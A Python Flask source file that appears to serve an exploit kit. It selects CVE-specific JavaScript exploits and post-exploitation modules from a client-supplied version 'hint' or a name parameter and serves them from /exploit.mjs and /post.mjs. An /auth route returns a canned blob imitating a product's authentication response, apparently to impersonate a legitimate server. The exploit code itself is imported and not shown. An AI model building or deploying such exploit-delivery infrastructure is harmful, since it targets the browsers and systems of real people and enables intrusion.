import json import os import sys from flask import Flask, request, redirect, make_response, send_from_directory # Fix the python import path for this module modpath = os.path.join(os.path.dirname(__file__)) if modpath not in sys.path: sys.path.append(modpath) import versions import logging logger = logging.getLogger(__name__) app = Flask(__name__) BASE_PATH = "" @app.route(f"{BASE_PATH}/") @app.route(f"{BASE_PATH}/index.html") @app.route(f"{BASE_PATH}/xxx") def index(): return send_from_directory(os.path.dirname(__file__), "index.html") @app.route(f"{BASE_PATH}/exploit.mjs") def exploit(): exploit = None hint = request.cookies.get("hint", request.args.get("hint")) if hint is None: return versions.Unexploitable.render({"version" : "Unknown"}) hint = json.loads(hint) logger.warning(str(request.args)) e = request.args.get("e") if e is not None: # For subclasses of CVE, check if the name is equal to e for cls in versions.CVE.__subclasses__(): if cls.name == e: exploit = cls break if exploit is None: # Determin the exploit index eindex = 0 try: eindex = int(request.args.get("eindex", "0")) except ValueError: pass exploit = versions.get_exploit(hint, eindex=eindex) logger.warning(f"Selected exploit: {exploit.name}") response = make_response(exploit.render(hint)) response.headers["Content-Type"] = "text/javascript" return response @app.route(f"{BASE_PATH}/auth") def auth(): return """92833c4be54f5eaa03b63ff7a3a75440f63ca909b0aca84080ac3c877056a707e368df8dca438bea3cc913f58476f32feea3c8426618a149fdcd1995be720a9b1f1a7cb0f1a740e7901146c6e1bc7eac8319d94912b6326aeddd9f21ac6d674e5811fc7aa9c56488d42ac1ff6f433c79c0672af06a8fcc8989c6072f3aad9ac110001pvMKt46vRuquH_bO12edqw|OmIeLUW1nleF1IGEVXCJTQTO4P8h3sdw0.320.3218.12025.12025.1.020251.25.0508.0920unrestricted2.2301.0...yes/vizportal/api/clientxml/auth/pubkey50000falsetruetrue50443true443truetruefalsetruesamluser-passwordfalse""" @app.route(f"{BASE_PATH}/post.mjs") def post(): post = None hint = request.cookies.get("hint", request.args.get("hint")) if hint is None: return versions.Unexploitable.render({"version" : "Unknown"}) hint = json.loads(hint) logger.warning(str(request.args)) p = request.args.get("p") if p is not None: # For subclasses of POST, check if the name is equal to p for cls in versions.Post.__subclasses__(): if cls.name == p: post = cls break if post is None: post = versions.get_post(hint) response = make_response(post.render(hint)) response.headers["Content-Type"] = "text/javascript" return response @app.errorhandler(404) def not_found(e): return redirect("/index.html", code=302) # return f"{request.path} not found! {request.args}"